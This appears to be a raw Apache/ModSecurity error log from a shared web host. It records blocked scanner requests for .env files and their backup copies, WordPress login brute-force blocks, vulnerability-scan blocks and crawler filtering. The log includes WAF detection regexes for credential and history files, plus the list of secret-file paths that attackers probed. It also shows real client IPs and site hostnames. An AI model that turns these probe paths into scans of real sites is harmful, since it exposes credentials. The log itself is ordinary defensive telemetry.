[Tue May 26 13:09:40.452513 2026] [security2:error] [pid 496740:tid 496902] [client 4.194.232.122:46454] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "162.215.241.212"] [uri "/"] [unique_id "ahVOPOvOeft4ltnLrH4bpwAAACA"]
[Tue May 26 13:09:42.044696 2026] [security2:error] [pid 496740:tid 496936] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOPevOeft4ltnLrH4b4QAAAEI"]
[Tue May 26 13:09:44.516831 2026] [security2:error] [pid 496740:tid 496892] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOQOvOeft4ltnLrH4cZAAAABY"]
[Tue May 26 13:09:46.890103 2026] [security2:error] [pid 496740:tid 496807] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/install.php"] [unique_id "ahVOQuvOeft4ltnLrH4c9AAAYEI"]
[Tue May 26 13:09:46.900497 2026] [security2:error] [pid 496740:tid 496785] [remote 18.190.7.192:35210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVOQuvOeft4ltnLrH4c5AAAGyw"]
[Tue May 26 13:09:46.916399 2026] [security2:error] [pid 496740:tid 496984] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOQuvOeft4ltnLrH4c2gAAAHI"]
[Tue May 26 13:09:47.870349 2026] [security2:error] [pid 496740:tid 496792] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/setup.php"] [unique_id "ahVOQ-vOeft4ltnLrH4dKQAAPDM"]
[Tue May 26 13:09:49.134103 2026] [security2:error] [pid 496740:tid 496979] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOROvOeft4ltnLrH4dTwAAAG0"]
[Tue May 26 13:09:52.288526 2026] [security2:error] [pid 496740:tid 496922] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOR-vOeft4ltnLrH4d0gAAADQ"]
[Tue May 26 13:09:53.351230 2026] [security2:error] [pid 496740:tid 496848] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/error.php"] [unique_id "ahVOSevOeft4ltnLrH4eCgAANms"]
[Tue May 26 13:09:56.594902 2026] [security2:error] [pid 496740:tid 496964] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOTOvOeft4ltnLrH4ecAAAAF4"]
[Tue May 26 13:09:57.525959 2026] [security2:error] [pid 496740:tid 496962] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOTevOeft4ltnLrH4emQAAAFw"]
[Tue May 26 13:09:58.434098 2026] [security2:error] [pid 496740:tid 496880] [client 123.31.201.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOTuvOeft4ltnLrH4fLAAAAAo"]
[Tue May 26 13:09:59.992081 2026] [security2:error] [pid 496740:tid 496927] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOT-vOeft4ltnLrH4feQAAADk"]
[Tue May 26 13:10:02.458263 2026] [security2:error] [pid 496740:tid 496962] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOUevOeft4ltnLrH4f-wAAAFw"]
[Tue May 26 13:10:03.023736 2026] [security2:error] [pid 496740:tid 496844] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/connector.php"] [unique_id "ahVOU-vOeft4ltnLrH4gHwAAVGc"]
[Tue May 26 13:10:03.715106 2026] [security2:error] [pid 496740:tid 496883] [client 142.248.80.209:50656] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/backend/.env"] [unique_id "ahVOU-vOeft4ltnLrH4gPgAAAA0"]
[Tue May 26 13:10:03.717419 2026] [security2:error] [pid 496740:tid 496907] [client 142.248.80.209:50646] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/app/.env"] [unique_id "ahVOU-vOeft4ltnLrH4gQQAAACU"]
[Tue May 26 13:10:03.735409 2026] [security2:error] [pid 496740:tid 496992] [client 142.248.80.209:50654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/api/.env"] [unique_id "ahVOU-vOeft4ltnLrH4gRAAAAHo"]
[Tue May 26 13:10:04.042128 2026] [security2:error] [pid 496740:tid 496890] [client 142.248.80.209:50568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env"] [unique_id "ahVOVOvOeft4ltnLrH4gXgAAABQ"]
[Tue May 26 13:10:04.407447 2026] [ssl:error] [pid 496740:tid 496956] [client 3.233.59.216:35877] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcalendars.omshriinfra.omshriinfrastructures.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:10:05.357689 2026] [security2:error] [pid 496740:tid 496942] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOVOvOeft4ltnLrH4ggwAAAEg"]
[Tue May 26 13:10:06.147505 2026] [security2:error] [pid 496740:tid 496934] [client 94.26.106.90:55078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.ustechinformation.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVOVuvOeft4ltnLrH4grAAAAEA"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 13:10:06.517127 2026] [security2:error] [pid 496740:tid 496986] [client 142.248.80.209:50800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.copy"] [unique_id "ahVOVuvOeft4ltnLrH4gxAAAAHQ"]
[Tue May 26 13:10:06.522799 2026] [security2:error] [pid 496740:tid 496915] [client 94.26.106.90:62758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.ustechinformation.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVOVuvOeft4ltnLrH4gxgAAAC0"], referer: https://duckduckgo.com/
[Tue May 26 13:10:06.565101 2026] [security2:error] [pid 496740:tid 496924] [client 185.191.171.4:46094] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVOVuvOeft4ltnLrH4gygAAADY"]
[Tue May 26 13:10:06.565211 2026] [security2:error] [pid 496740:tid 496924] [client 185.191.171.4:46094] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVOVuvOeft4ltnLrH4gygAAADY"]
[Tue May 26 13:10:06.817930 2026] [security2:error] [pid 496740:tid 496963] [client 142.248.80.209:51000] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.bak"] [unique_id "ahVOVuvOeft4ltnLrH4g1AAAAF0"]
[Tue May 26 13:10:06.819262 2026] [security2:error] [pid 496740:tid 496888] [client 142.248.80.209:50986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.copy"] [unique_id "ahVOVuvOeft4ltnLrH4g2QAAABI"]
[Tue May 26 13:10:06.819590 2026] [security2:error] [pid 496740:tid 496942] [client 142.248.80.209:50984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.orig"] [unique_id "ahVOVuvOeft4ltnLrH4g1QAAAEg"]
[Tue May 26 13:10:06.819652 2026] [security2:error] [pid 496740:tid 496886] [client 142.248.80.209:50966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local~"] [unique_id "ahVOVuvOeft4ltnLrH4g1wAAABA"]
[Tue May 26 13:10:06.820027 2026] [security2:error] [pid 496740:tid 496944] [client 142.248.80.209:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.backup"] [unique_id "ahVOVuvOeft4ltnLrH4g1gAAAEo"]
[Tue May 26 13:10:06.820289 2026] [security2:error] [pid 496740:tid 496966] [client 142.248.80.209:50904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.copy"] [unique_id "ahVOVuvOeft4ltnLrH4g3QAAAGA"]
[Tue May 26 13:10:06.820370 2026] [security2:error] [pid 496740:tid 496926] [client 142.248.80.209:50920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.bak"] [unique_id "ahVOVuvOeft4ltnLrH4g2wAAADg"]
[Tue May 26 13:10:06.821012 2026] [security2:error] [pid 496740:tid 496967] [client 142.248.80.209:50972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.swp"] [unique_id "ahVOVuvOeft4ltnLrH4g2gAAAGE"]
[Tue May 26 13:10:06.821242 2026] [security2:error] [pid 496740:tid 496960] [client 142.248.80.209:50934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.old"] [unique_id "ahVOVuvOeft4ltnLrH4g3AAAAFo"]
[Tue May 26 13:10:06.833508 2026] [security2:error] [pid 496740:tid 496887] [client 142.248.80.209:50890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.orig"] [unique_id "ahVOVuvOeft4ltnLrH4g3gAAABE"]
[Tue May 26 13:10:06.834175 2026] [security2:error] [pid 496740:tid 496898] [client 142.248.80.209:50848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.backup"] [unique_id "ahVOVuvOeft4ltnLrH4g5AAAABw"]
[Tue May 26 13:10:06.835001 2026] [security2:error] [pid 496740:tid 496882] [client 142.248.80.209:50838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.old"] [unique_id "ahVOVuvOeft4ltnLrH4g6AAAAAw"]
[Tue May 26 13:10:06.835127 2026] [security2:error] [pid 496740:tid 496984] [client 142.248.80.209:50834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.bak"] [unique_id "ahVOVuvOeft4ltnLrH4g5wAAAHI"]
[Tue May 26 13:10:06.835219 2026] [security2:error] [pid 496740:tid 496919] [client 142.248.80.209:50818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.backup"] [unique_id "ahVOVuvOeft4ltnLrH4g5gAAADE"]
[Tue May 26 13:10:06.835510 2026] [security2:error] [pid 496740:tid 496897] [client 142.248.80.209:50800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production~"] [unique_id "ahVOVuvOeft4ltnLrH4g6wAAABs"]
[Tue May 26 13:10:06.835792 2026] [security2:error] [pid 496740:tid 496879] [client 142.248.80.209:50876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.swp"] [unique_id "ahVOVuvOeft4ltnLrH4g4gAAAAk"]
[Tue May 26 13:10:06.836235 2026] [security2:error] [pid 496740:tid 496954] [client 142.248.80.209:50826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.old"] [unique_id "ahVOVuvOeft4ltnLrH4g5QAAAFQ"]
[Tue May 26 13:10:06.836902 2026] [security2:error] [pid 496740:tid 496939] [client 142.248.80.209:50860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env~"] [unique_id "ahVOVuvOeft4ltnLrH4g6QAAAEU"]
[Tue May 26 13:10:07.120574 2026] [security2:error] [pid 496740:tid 496900] [client 142.248.80.209:51062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.swp"] [unique_id "ahVOV-vOeft4ltnLrH4g9AAAAB4"]
[Tue May 26 13:10:07.120879 2026] [security2:error] [pid 496740:tid 496955] [client 142.248.80.209:51046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.orig"] [unique_id "ahVOV-vOeft4ltnLrH4g9QAAAFU"]
[Tue May 26 13:10:07.666682 2026] [security2:error] [pid 496740:tid 496989] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOV-vOeft4ltnLrH4g_QAAAHc"]
[Tue May 26 13:10:09.316856 2026] [security2:error] [pid 496740:tid 496771] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/cron.php"] [unique_id "ahVOWevOeft4ltnLrH4hRwAARh4"]
[Tue May 26 13:10:10.192169 2026] [security2:error] [pid 496740:tid 496879] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOWevOeft4ltnLrH4hVwAAAAk"]
[Tue May 26 13:10:12.957579 2026] [security2:error] [pid 496740:tid 496884] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOXOvOeft4ltnLrH4h0QAAAA4"]
[Tue May 26 13:10:14.204302 2026] [security2:error] [pid 496740:tid 496971] [client 142.147.199.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVOXevOeft4ltnLrH4iDgAAAGU"]
[Tue May 26 13:10:15.455099 2026] [security2:error] [pid 496740:tid 496953] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOX-vOeft4ltnLrH4iTgAAAFM"]
[Tue May 26 13:10:16.669271 2026] [security2:error] [pid 496740:tid 496994] [client 2a02:c207:3010:7548::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVOYOvOeft4ltnLrH4idwAAfFA"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 13:10:18.056329 2026] [security2:error] [pid 496740:tid 496986] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOYevOeft4ltnLrH4ivAAAAHQ"]
[Tue May 26 13:10:18.717397 2026] [security2:error] [pid 496740:tid 496889] [client 66.132.172.131:10408] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVOYuvOeft4ltnLrH4ixgAAABM"]
[Tue May 26 13:10:20.528985 2026] [security2:error] [pid 496740:tid 496911] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOZOvOeft4ltnLrH4jDwAAACk"]
